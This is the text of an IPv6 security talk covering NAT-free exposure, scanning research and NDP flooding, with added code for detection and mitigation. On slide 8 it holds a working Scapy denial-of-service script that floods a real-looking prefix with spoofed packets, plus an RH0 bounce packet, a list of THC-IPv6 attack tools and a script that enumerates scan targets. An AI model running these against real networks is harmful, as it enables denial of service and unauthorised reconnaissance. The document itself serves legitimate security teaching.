A little bit of IPv6 security
       Rafa Sanchez Gómez – CISA
             rafa@iniqua.com
             @r_a_ff_a_e_ll_o




                   1
IPv6 Security

1. Brief introduction to IPv6
2. Some security risks in IPv6
3. Research results
4. Demo

               2
1. Brief introduction to IPv6




                 3
Some interesting aspects of IPv6

The main driver for IPv6 is its increased address space: IPv6 uses 128-bit addresses.

There are different address types (unicast, anycast, and multicast) and different address scopes (link-local, global, etc.).

It is common for a node to be using, at any given time, several addresses, of multiple types and scopes.

                            4
Some interesting aspects of IPv6

The "end-to-end principle" ...

Each device will have a globally unique address.

NATs will no longer be needed.




                        5
Hacking IPv6




               6
Hacking IPv6

Tools from the THC-IPV6 attack toolkit:
- parasite6: ICMPv6 neighbor solicitation/advertisement spoofer, puts you as man-in-the-middle, same as ARP MITM (and parasite)
- alive6: an effective alive scanner, which will detect all systems listening to this address
- fake_router6: announce yourself as a router on the network, with the highest priority
- redir6: redirect traffic to you intelligently (man-in-the-middle) with a clever ICMPv6 redirect spoofer
- toobig6: MTU decreaser with the same intelligence as redir6
- dos-new-ip6: detect new IPv6 devices and tell them that their chosen IP collides on the network (DoS)
- trace6: very fast traceroute6 which supports ICMPv6 echo request and TCP-SYN
- flood_router6: flood a target with random router advertisements
- flood_advertise6: flood a target with random neighbor advertisements
- exploit6: known IPv6 vulnerabilities to test against a target
- denial6: a collection of denial-of-service tests against a target
- fuzz_ip6: fuzzer for IPv6
- implementation6: performs various implementation checks on IPv6
- implementation6d: listen daemon for implementation6 to check behind a firewall
- fake_mld6: announce yourself in a multicast group on the net
- fake_mld26: same but for MLDv2

                                    7
Hacking IPv6

Scapy one-liner: an ICMPv6 echo request carrying a Routing Header type 0 (RH0). The packet is delivered to dst first, which then forwards it to the address listed in the routing header, so a single reachable host can be used to bounce traffic towards hosts behind it. RH0 processing was deprecated by RFC 5095 for exactly this reason, so expect current stacks to drop it.

    IPv6(dst="2a02:9001:0:ffff:80:58:105:253")/
    IPv6ExtHdrRouting(type=0, addresses=["2a02:9001:0:57::6"])/
    ICMPv6EchoRequest()

Scapy script used in the demo: echo requests with a spoofed source to random interface identifiers inside the target /64 (neighbor cache exhaustion, see the "NDP Flooding" slides). It needs root and a Scapy whose RandIP6() prints eight 4-digit groups, which is what the slicing assumes; here the packets leave through the 6in4 tunnel interface sit1.

    #!/usr/bin/python
    from scapy.all import *

    def aleatorio():
        # str(RandIP6()) is 8 groups of 4 hex digits (39 characters); keep the last
        # four groups (characters 20-38), i.e. a random 64-bit interface identifier
        ff = str(RandIP6())
        ff = ff[20:39]
        return ff

    for i in range(1, 100000):
        # spoofed source; destination = target prefix + random interface identifier.
        # Each new destination forces the last-hop router to create an INCOMPLETE
        # neighbor cache entry and send a Neighbor Solicitation that nobody answers.
        packet = IPv6(src="2001:5c0:1400:a:8000:0:580c:3aa",
                      dst="2a02:9008:3:111:" + aleatorio()) / ICMPv6EchoRequest()
        send(packet, iface="sit1")

                                      8
2. Some security risks in IPv6




                9
IPv4 Attack Example

[Diagram: hosts on an internal network behind the IPv4 gateway; "Victim is attacked!!!"]



                             10
IPv6 Connectivity Schema

[Diagram: hosts numbered from the public prefix assigned to the site, 2a02:9008:3::/64, behind the router 2a02:9008:3::1; the router's administration interface listens on that global address.]

No NAT needed with IPv6
No internal network needed
Direct connectivity

Note that IPv4 NAT blocks unsolicited inbound connections only as a side effect. With global addresses that property has to come from an explicit stateful firewall; where none is configured, every address in the prefix, the router's administration interface included, is reachable from the Internet.




                                  11
IPv6 Phishing Attack Example

[Diagram: an attacker on the Internet connects directly to the router 2a02:9008:3::1 of the site's public prefix 2a02:9008:3::/64; "Victim is attacked!!!"]

Don't work too hard:
- No special vulnerability in the routers is needed.
- No interaction from the clients is needed.

Default passwords
Brute force (Hydra)
Exploit known vulnerabilities

                                           12
Users also exposed

End-to-end model: behind the router 2a02:9008:3::1, each user host has its own global address from the prefix (2a02:9008:3::a36:1, 2a02:9008:3::a35:2, 2a02:9008:3::a46:8, 2a02:9008:3::a86:6), and any service listening on it is reachable from the Internet.

Vulnerable services!!




                         13
3. Research results




         14
Administration Services exposed on the Internet

We did some research to check whether this was a real risk, and we discovered that indeed it is...

We collected public information available on the Internet about IPv6 prefixes assigned by LIRs.




                           15
IPv4 Connectivity




                    16
Administration Services exposed on the Internet

We scanned some of those prefixes just using nmap.

Only some of the first (lowest-numbered) addresses of each prefix: the 2^64 interface identifiers of a /64 cannot be swept exhaustively, but routers and servers tend to sit at predictable addresses...
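The scanning shortcut behind slides 13 and 17 is that a /64 cannot be brute-forced, but the addresses that matter are guessable. The following is an added example, not code from the talk: it builds the candidate list a scanner would be fed for a /64, from low-numbered addresses (the router on the slides is 2a02:9008:3::1), IPv4-derived numbering of dual-stack hosts, and the modified EUI-64 identifiers that SLAAC derives from a MAC address when privacy extensions (RFC 4941) are off. The prefix is the one on the slides; the MAC and IPv4 addresses fed in are constructed sample values.

```python
# Added example (not from the talk): enumerate the addresses in a /64 worth probing
# when a full sweep is impossible. PREFIX is from the slides; the MAC and IPv4
# values passed in below are constructed sample input.
import ipaddress
from typing import Iterable, List

PREFIX = ipaddress.IPv6Network("2a02:9008:3::/64")   # site prefix from the slides
IID_MASK = (1 << 64) - 1


def eui64_iid(mac: str) -> int:
    """Modified EUI-64 interface identifier for a 48-bit MAC (RFC 4291, Appendix A):
    OUI | ff:fe | NIC, with the universal/local bit (0x02 of the first octet) flipped."""
    octets = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(octets) != 6:
        raise ValueError("expected a 48-bit MAC address")
    eui = bytes([octets[0] ^ 0x02]) + octets[1:3] + b"\xff\xfe" + octets[3:]
    return int.from_bytes(eui, "big")


def host(prefix: ipaddress.IPv6Network, iid: int) -> ipaddress.IPv6Address:
    """Join a /64 prefix with a 64-bit interface identifier."""
    if prefix.prefixlen != 64:
        raise ValueError("only /64 prefixes are handled here")
    return ipaddress.IPv6Address(int(prefix.network_address) | (iid & IID_MASK))


def low_addresses(prefix: ipaddress.IPv6Network, count: int = 16) -> List[ipaddress.IPv6Address]:
    """prefix::1, prefix::2, ...: routers and hand-numbered servers."""
    return [host(prefix, i) for i in range(1, count + 1)]


def ipv4_embedded(prefix: ipaddress.IPv6Network, ipv4: str) -> List[ipaddress.IPv6Address]:
    """Dual-stack hosts are often numbered after their IPv4 address, in two styles:
    the 32-bit value in the low two groups (prefix::c000:20a for 192.0.2.10) or the
    dotted-decimal digits reused as hex groups (prefix::192:0:2:10)."""
    v4 = ipaddress.IPv4Address(ipv4)
    as_hex = host(prefix, int(v4))
    g = [int(part, 16) for part in str(v4).split(".")]
    as_digits = host(prefix, (g[0] << 48) | (g[1] << 32) | (g[2] << 16) | g[3])
    return [as_hex, as_digits]


def eui64_addresses(prefix: ipaddress.IPv6Network, macs: Iterable[str]) -> List[ipaddress.IPv6Address]:
    """SLAAC without privacy extensions derives the IID from the MAC, so a known or
    guessed MAC (vendor OUI plus a small serial range) gives the global address."""
    return [host(prefix, eui64_iid(m)) for m in macs]


def candidate_targets(prefix: ipaddress.IPv6Network, macs: Iterable[str] = (),
                      ipv4s: Iterable[str] = (), low: int = 16) -> List[ipaddress.IPv6Address]:
    """Deduplicated, sorted list of addresses to hand to a scanner such as nmap -6."""
    found = set(low_addresses(prefix, low))
    found.update(eui64_addresses(prefix, macs))
    for a in ipv4s:
        found.update(ipv4_embedded(prefix, a))
    return sorted(found)


if __name__ == "__main__":
    # constructed sample input: one guessed MAC and one known IPv4 address of the site
    for addr in candidate_targets(PREFIX, macs=["00:11:22:33:44:55"], ipv4s=["192.0.2.10"], low=4):
        print(addr)
```

The list is deliberately short: this is the kind of "first IPs of each prefix" probe the research used, not a sweep. Hosts using RFC 4941 temporary addresses will not show up this way, which is also why privacy extensions are worth enabling on clients.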




                           17
Administration Services exposed on the Internet




                        18
Administration Services exposed on the Internet

Mail services in IPv6: the SPAM nightmare is coming...




                         19
4. Demo …




    20
Tunneling...

1. Windows 7
2. Linux (BackTrack)
3. Mac OS




           21
NDP

[Diagram: normal Neighbor Discovery for 2a02:9008:3:f0f0:437:af0:665:8 on the public prefix 2a02:9008:3:f0f0::/64 (written 2a02:9008:3:f0f0:/64 on the slide). Other hosts on the link: 2a02:9008:3:f0f0:889:acb:9999:1 and 2a02:9008:3:f0f0:7676:bbb:9:10.]




                                     22
NDP Flooding...

[Diagram: the attacker sends packets to 2a02:9008:3:f0f0:RAND, random interface identifiers inside the public prefix 2a02:9008:3:f0f0::/64; for each one the router has to solicit a neighbor that does not exist. Hosts on the link: 2a02:9008:3:f0f0:437:af0:665:8, 2a02:9008:3:f0f0:889:acb:9999:1, 2a02:9008:3:f0f0:7676:bbb:9:10.]

Router neighbor cache (labelled "CAM Table" on the slide; a CAM table maps MAC addresses to switch ports, whereas the table that fills up here is the router's NDP neighbor cache, link-layer address to IPv6 address):
11:22:33:44:55:66 - 2a02:9008:3:f0f0:437:af0:665:8
66:55:44:33:22:11 - 2a02:9008:3:f0f0:7676:bbb:9:10
...-...
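What the flood from slide 8's script looks like on the router, and how to catch it: an added example, not code from the talk. It parses the output of "ip -6 neigh show" on a Linux router and counts unresolved (INCOMPLETE/FAILED) entries per interface, flagging the served prefix when they reach the configured cap or outnumber the resolved neighbors. The neighbor listing below is constructed for the example, reusing the addresses and MACs from the NDP slides; the random-looking addresses stand in for the RAND identifiers the attacker targets.

```python
# Added example (not from the talk): detect neighbor cache exhaustion from
# "ip -6 neigh show" output. SAMPLE_NEIGH is constructed for this example.
from collections import defaultdict
from dataclasses import dataclass
import ipaddress
from typing import Dict, Iterable, List

TARGET_PREFIX = ipaddress.IPv6Network("2a02:9008:3:f0f0::/64")   # prefix from the slides

# Constructed sample of "ip -6 neigh show": three real hosts, the link-local router,
# five entries the router could never resolve, and one neighbor on another interface.
SAMPLE_NEIGH = """\
2a02:9008:3:f0f0:437:af0:665:8 dev eth0 lladdr 11:22:33:44:55:66 REACHABLE
2a02:9008:3:f0f0:7676:bbb:9:10 dev eth0 lladdr 66:55:44:33:22:11 STALE
2a02:9008:3:f0f0:889:acb:9999:1 dev eth0 lladdr 00:00:5e:00:53:22 DELAY
fe80::1 dev eth0 lladdr 00:00:5e:00:53:01 router REACHABLE
2a02:9008:3:f0f0:9c1e:2b07:f1a4:d3 dev eth0  INCOMPLETE
2a02:9008:3:f0f0:1fa3:7e19:c02:44b dev eth0  INCOMPLETE
2a02:9008:3:f0f0:6b40:e8c2:7f0:ab12 dev eth0  INCOMPLETE
2a02:9008:3:f0f0:d91:55a0:3c3e:91 dev eth0  FAILED
2a02:9008:3:f0f0:e7e7:2a1:b9b9:f0 dev eth0  FAILED
2001:db8:1::2 dev eth1 lladdr 00:00:5e:00:53:33 REACHABLE
"""

UNRESOLVED = {"INCOMPLETE", "FAILED"}


@dataclass
class Neighbor:
    addr: ipaddress.IPv6Address
    iface: str
    lladdr: str      # empty while the entry is unresolved
    state: str


def parse_neigh(output: str) -> List[Neighbor]:
    """Parse lines of the form: <addr> dev <iface> [lladdr <mac>] [router] [proxy] <STATE>."""
    entries = []
    for line in output.splitlines():
        tok = line.split()
        if len(tok) < 4 or tok[1] != "dev":
            continue                      # blank line or something that is not a neighbor entry
        lladdr = tok[tok.index("lladdr") + 1] if "lladdr" in tok else ""
        entries.append(Neighbor(ipaddress.IPv6Address(tok[0]), tok[2], lladdr, tok[-1]))
    return entries


@dataclass
class CacheStats:
    total: int = 0
    unresolved: int = 0
    unresolved_in_prefix: int = 0


def cache_pressure(entries: Iterable[Neighbor], prefix: ipaddress.IPv6Network) -> Dict[str, CacheStats]:
    """Per-interface counts. Unresolved entries for never-seen identifiers inside the served
    prefix are the signature of the flood: the router solicits, nobody answers."""
    stats: Dict[str, CacheStats] = defaultdict(CacheStats)
    for n in entries:
        s = stats[n.iface]
        s.total += 1
        if n.state in UNRESOLVED:
            s.unresolved += 1
            if n.addr in prefix:
                s.unresolved_in_prefix += 1
    return dict(stats)


def under_attack(stats: CacheStats, max_unresolved: int) -> bool:
    """True when unresolved entries in the prefix reach the cap you operate with
    (compare net.ipv6.neigh.<iface>.gc_thresh3 on Linux) or outnumber resolved ones."""
    majority = stats.total > 0 and stats.unresolved * 2 > stats.total
    return stats.unresolved_in_prefix >= max_unresolved or majority


if __name__ == "__main__":
    for iface, st in cache_pressure(parse_neigh(SAMPLE_NEIGH), TARGET_PREFIX).items():
        print(iface, st, "ALERT" if under_attack(st, max_unresolved=4) else "ok")
```

The same counting can be done on a live box with "ip -6 neigh show dev eth0" piped in. The fix is on the router side (RFC 6583 discusses the operational options): cap the cache or the unresolved entries per interface (gc_thresh1/2/3 under net.ipv6.neigh on Linux, "ipv6 nd cache interface-limit" on Cisco IOS), rate-limit Neighbor Solicitations, and avoid announcing a full /64 on links that only ever carry a handful of hosts.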

                             23
NDP Flooding in action…




             24
Questions ???




        Rafa Sánchez Gómez
           rafa@iniqua.com
           @R_a_ff_a_e_ll_o
es.linkedin.com/in/rafasanchezgomez
                 25
